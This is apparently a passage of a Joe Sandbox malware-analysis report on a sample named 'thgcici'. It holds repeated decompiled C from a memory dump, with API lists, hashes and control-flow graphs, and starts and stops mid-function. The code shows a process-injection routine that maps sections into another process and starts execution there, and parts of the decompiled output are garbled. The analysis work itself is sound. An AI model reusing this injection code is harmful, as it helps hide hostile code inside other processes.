                                                					 *_t188 = 0x18;
                                                					_push(_t202 - 0x30);
                                                					_push(_t188);
                                                					_push(0x40);
                                                					_push(_t202 - 0x10);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t202 - 8)) = 0;
                                                						_t99 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t190 = _t202 - 0x54;
                                                						if(NtCreateSection(_t190, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t202 - 0x50);
                                                							_t122 = _t202 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t190, 0xffffffff, _t122, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t202 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t124, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                									_t201 =  *(_t202 - 0x44);
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t201, 0x104);
                                                									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                						_t188 = _t202 - 0x58;
                                                						if(NtCreateSection(_t188, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
                                                							 *_t46 =  *(_t202 - 0x50);
                                                							_t103 = _t202 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t202 - 0x40;
                                                								 *_t105 = 0;
                                                								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
                                                								if(_t224 == 0) {
                                                									L22();
                                                									if(_t224 == 0 && _t224 != 0) {
                                                										asm("hlt");
                                                										_push(_t205);
                                                									}
                                                									_push(0x2ea6);
                                                									_t209 = _t205 + 4;
                                                									_t161 = 0x2260;
                                                									_t162 = _t161 << 5;
                                                									_t163 = _t162 + 0x2260;
                                                									asm("lodsb");
                                                									_t164 = _t163;
                                                									asm("loop 0xffffffc4");
                                                									_t165 = _t164 ^ 0xad610a21;
                                                									_t205 = _t209 - _t165;
                                                									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                                                									_t139 =  *(_t195 + 6) & 0x0000ffff;
                                                									_push(_t195);
                                                									_t166 = _t195;
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_t167 = _t166 + 0xf8;
                                                										__eflags = _t167;
                                                									} else {
                                                										_t167 = _t166 + 0x108;
                                                									}
                                                									_push(_t139);
                                                									_t140 =  *(_t167 + 0x10);
                                                									if(_t140 != 0) {
                                                										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                                                										_t205 = _t205 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t188);
                                                									_t228 =  *((intOrPtr*)(_t202 - 0x34));
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_push(_t188);
                                                										_t170 = _t188[0xd] -  *(_t202 - 0x40);
                                                										_t198 = _t188[0x28] +  *(_t202 - 0x48);
                                                										__eflags = _t198;
                                                										while(1) {
                                                											__eflags =  *_t198;
                                                											if( *_t198 == 0) {
                                                												break;
                                                											}
                                                											_t180 =  *_t198;
                                                											_t198 = _t198 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t170;
                                                												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t188);
                                                										__eflags = 0;
                                                										_t109 = _t202 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t109, 0);
                                                									} else {
                                                										L55();
                                                										_pop(_t181);
                                                										_t182 = _t181 - 0x1892;
                                                										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
                                                										L004012E3(_t128, _t228);
                                                										0x33(_t182 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t205;
                                                				_push(0x392);
                                                				_t157 = 0xf1;
                                                				return L00401274(_t92, _t157, _t188, _t228);
                                                			}








































                                                0x004015ee
                                                0x004015f4
                                                0x004015fc
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 801b548cec8a15623861cda356d4c2b563af3d476dac939860f63dcf050ff5b4
                                                • Instruction ID: 6c2b391f055ddb0142fb10ad77502f624f49f79eb41efd18acee614c01c4bb16
                                                • Opcode Fuzzy Hash: 801b548cec8a15623861cda356d4c2b563af3d476dac939860f63dcf050ff5b4
                                                • Instruction Fuzzy Hash: CF5109B4900245BFEF219F91CC48FEBBBB8EF85B00F140169FA11BA2A5D6759945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 231 401602-40162b call 401274 240 401630-401635 231->240 241 40162d 231->241 243 401956-40195e 240->243 244 40163b-40164c 240->244 241->240 243->240 249 401963-4019b3 call 401274 243->249 247 401652-40167b 244->247 248 401954 244->248 247->248 257 401681-401698 NtDuplicateObject 247->257 248->249 257->248 259 40169e-4016c2 NtCreateSection 257->259 260 4016c4-4016e5 NtMapViewOfSection 259->260 261 40171e-401744 NtCreateSection 259->261 260->261 263 4016e7-401703 NtMapViewOfSection 260->263 261->248 264 40174a-40174e 261->264 263->261 266 401705-40171b 263->266 264->248 267 401754-401775 NtMapViewOfSection 264->267 266->261 267->248 269 40177b-401797 NtMapViewOfSection 267->269 269->248 272 40179d call 4017a2 269->272
                                                C-Code - Quality: 58%
                                                			E00401602(void* __esi, void* __eflags) {
                                                				void* _t85;
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t132;
                                                				signed int _t139;
                                                				int _t140;
                                                				void* _t157;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				signed int _t165;
                                                				void* _t166;
                                                				intOrPtr* _t167;
                                                				void* _t170;
                                                				intOrPtr _t180;
                                                				void* _t181;
                                                				void* _t182;
                                                				HANDLE* _t188;
                                                				HANDLE* _t190;
                                                				void* _t195;
                                                				intOrPtr* _t198;
                                                				void* _t201;
                                                				void* _t202;
                                                				void* _t204;
                                                				intOrPtr* _t205;
                                                				void* _t209;
                                                				long _t224;
                                                
                                                				asm("outsb");
                                                				_push(0x392);
                                                				_t205 = _t204 + 4;
                                                				L00401274(_t85, 0xf1, __esi, __eflags);
                                                				_t128 =  *((intOrPtr*)(_t202 + 8));
                                                				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
                                                				_t188 = _t202 - 0x60;
                                                				 *_t188 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t188);
                                                				_t91 =  *_t188;
                                                				if(_t91 != 0) {
                                                					_t132 = _t202 - 0x30;
                                                					 *_t132 = _t91;
                                                					_t132[1] = 0;
                                                					_t188 = _t202 - 0x28;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t188, 0x18);
                                                					 *_t188 = 0x18;
                                                					_push(_t202 - 0x30);
                                                					_push(_t188);
                                                					_push(0x40);
                                                					_push(_t202 - 0x10);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t202 - 8)) = 0;
                                                						_t99 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t190 = _t202 - 0x54;
                                                						if(NtCreateSection(_t190, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t202 - 0x50);
                                                							_t122 = _t202 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t190, 0xffffffff, _t122, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t202 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t124, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                									_t201 =  *(_t202 - 0x44);
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t201, 0x104);
                                                									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                						_t188 = _t202 - 0x58;
                                                						if(NtCreateSection(_t188, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
                                                							 *_t46 =  *(_t202 - 0x50);
                                                							_t103 = _t202 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t202 - 0x40;
                                                								 *_t105 = 0;
                                                								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
                                                								if(_t224 == 0) {
                                                									L21();
                                                									if(_t224 == 0 && _t224 != 0) {
                                                										asm("hlt");
                                                										_push(_t205);
                                                									}
                                                									_push(0x2ea6);
                                                									_t209 = _t205 + 4;
                                                									_t161 = 0x2260;
                                                									_t162 = _t161 << 5;
                                                									_t163 = _t162 + 0x2260;
                                                									asm("lodsb");
                                                									_t164 = _t163;
                                                									asm("loop 0xffffffc4");
                                                									_t165 = _t164 ^ 0xad610a21;
                                                									_t205 = _t209 - _t165;
                                                									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                                                									_t139 =  *(_t195 + 6) & 0x0000ffff;
                                                									_push(_t195);
                                                									_t166 = _t195;
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_t167 = _t166 + 0xf8;
                                                										__eflags = _t167;
                                                									} else {
                                                										_t167 = _t166 + 0x108;
                                                									}
                                                									_push(_t139);
                                                									_t140 =  *(_t167 + 0x10);
                                                									if(_t140 != 0) {
                                                										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                                                										_t205 = _t205 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t188);
                                                									_t228 =  *((intOrPtr*)(_t202 - 0x34));
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_push(_t188);
                                                										_t170 = _t188[0xd] -  *(_t202 - 0x40);
                                                										_t198 = _t188[0x28] +  *(_t202 - 0x48);
                                                										__eflags = _t198;
                                                										while(1) {
                                                											__eflags =  *_t198;
                                                											if( *_t198 == 0) {
                                                												break;
                                                											}
                                                											_t180 =  *_t198;
                                                											_t198 = _t198 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t170;
                                                												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t188);
                                                										__eflags = 0;
                                                										_t109 = _t202 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t109, 0);
                                                									} else {
                                                										L54();
                                                										_pop(_t181);
                                                										_t182 = _t181 - 0x1892;
                                                										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
                                                										L004012E3(_t128, _t228);
                                                										0x33(_t182 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t205;
                                                				_push(0x392);
                                                				_t157 = 0xf1;
                                                				return L00401274(_t92, _t157, _t188, _t228);
                                                			}








































                                                0x00401602
                                                0x004015f4
                                                0x004015fc
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 96db63f7d77d4681a7c8b0b211a7f1c9fea7a796f5373a4cc62486394675adc4
                                                • Instruction ID: ddd3f8d359e1be272fa8e6b980a73181fe92d2cf62f6648a3517e1c41251e5f0
                                                • Opcode Fuzzy Hash: 96db63f7d77d4681a7c8b0b211a7f1c9fea7a796f5373a4cc62486394675adc4
                                                • Instruction Fuzzy Hash: 4C5108B4900245BBEF209F91CC48FEBBBB8EF85B00F140169FA11BA2A5D6759945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 275 401605-40162b call 401274 282 401630-401635 275->282 283 40162d 275->283 285 401956-40195e 282->285 286 40163b-40164c 282->286 283->282 285->282 291 401963-4019b3 call 401274 285->291 289 401652-40167b 286->289 290 401954 286->290 289->290 299 401681-401698 NtDuplicateObject 289->299 290->291 299->290 301 40169e-4016c2 NtCreateSection 299->301 302 4016c4-4016e5 NtMapViewOfSection 301->302 303 40171e-401744 NtCreateSection 301->303 302->303 305 4016e7-401703 NtMapViewOfSection 302->305 303->290 306 40174a-40174e 303->306 305->303 308 401705-40171b 305->308 306->290 309 401754-401775 NtMapViewOfSection 306->309 308->303 309->290 311 40177b-401797 NtMapViewOfSection 309->311 311->290 314 40179d call 4017a2 311->314
                                                C-Code - Quality: 58%
                                                			E00401605(void* __esi, void* __eflags) {
                                                				void* _t85;
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t131;
                                                				signed int _t138;
                                                				int _t139;
                                                				void* _t156;
                                                				signed int _t160;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				void* _t165;
                                                				intOrPtr* _t166;
                                                				void* _t169;
                                                				intOrPtr _t179;
                                                				void* _t180;
                                                				void* _t181;
                                                				HANDLE* _t187;
                                                				HANDLE* _t189;
                                                				void* _t194;
                                                				intOrPtr* _t197;
                                                				void* _t200;
                                                				void* _t201;
                                                				intOrPtr* _t203;
                                                				void* _t207;
                                                				long _t222;
                                                
                                                				asm("scasb");
                                                				L00401274(_t85, 0xf1, __esi, __eflags);
                                                				_t128 =  *((intOrPtr*)(_t201 + 8));
                                                				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t201 - 0x5c)) = _t88;
                                                				_t187 = _t201 - 0x60;
                                                				 *_t187 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t187);
                                                				_t91 =  *_t187;
                                                				if(_t91 != 0) {
                                                					_t131 = _t201 - 0x30;
                                                					 *_t131 = _t91;
                                                					_t131[1] = 0;
                                                					_t187 = _t201 - 0x28;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
                                                					 *_t187 = 0x18;
                                                					_push(_t201 - 0x30);
                                                					_push(_t187);
                                                					_push(0x40);
                                                					_push(_t201 - 0x10);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t201 - 8)) = 0;
                                                						_t99 = _t201 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t189 = _t201 - 0x54;
                                                						if(NtCreateSection(_t189, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t201 - 0x50);
                                                							_t122 = _t201 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t189, 0xffffffff, _t122, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t201 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t189,  *(_t201 - 0xc), _t124, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                                                									_t200 =  *(_t201 - 0x44);
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t200, 0x104);
                                                									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                                                									 *((intOrPtr*)(_t201 - 8)) =  *((intOrPtr*)(_t201 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t201 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                                                						_t187 = _t201 - 0x58;
                                                						if(NtCreateSection(_t187, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t201 - 8)) != 0) {
                                                							 *_t46 =  *(_t201 - 0x50);
                                                							_t103 = _t201 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t187, 0xffffffff, _t103, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t201 - 0x40;
                                                								 *_t105 = 0;
                                                								_t222 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t105, 0, 0, 0, _t201 - 0x38, 1, 0, 0x20);
                                                								if(_t222 == 0) {
                                                									L19();
                                                									if(_t222 == 0 && _t222 != 0) {
                                                										asm("hlt");
                                                										_push(_t203);
                                                									}
                                                									_push(0x2ea6);
                                                									_t207 = _t203 + 4;
                                                									_t160 = 0x2260;
                                                									_t161 = _t160 << 5;
                                                									_t162 = _t161 + 0x2260;
                                                									asm("lodsb");
                                                									_t163 = _t162;
                                                									asm("loop 0xffffffc4");
                                                									_t164 = _t163 ^ 0xad610a21;
                                                									_t203 = _t207 - _t164;
                                                									_t194 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                                                									_t138 =  *(_t194 + 6) & 0x0000ffff;
                                                									_push(_t194);
                                                									_t165 = _t194;
                                                									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                										_t166 = _t165 + 0xf8;
                                                										__eflags = _t166;
                                                									} else {
                                                										_t166 = _t165 + 0x108;
                                                									}
                                                									_push(_t138);
                                                									_t139 =  *(_t166 + 0x10);
                                                									if(_t139 != 0) {
                                                										memcpy( *((intOrPtr*)(_t166 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t166 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t139);
                                                										_t203 = _t203 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t187);
                                                									_t226 =  *((intOrPtr*)(_t201 - 0x34));
                                                									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                										_push(_t187);
                                                										_t169 = _t187[0xd] -  *(_t201 - 0x40);
                                                										_t197 = _t187[0x28] +  *(_t201 - 0x48);
                                                										__eflags = _t197;
                                                										while(1) {
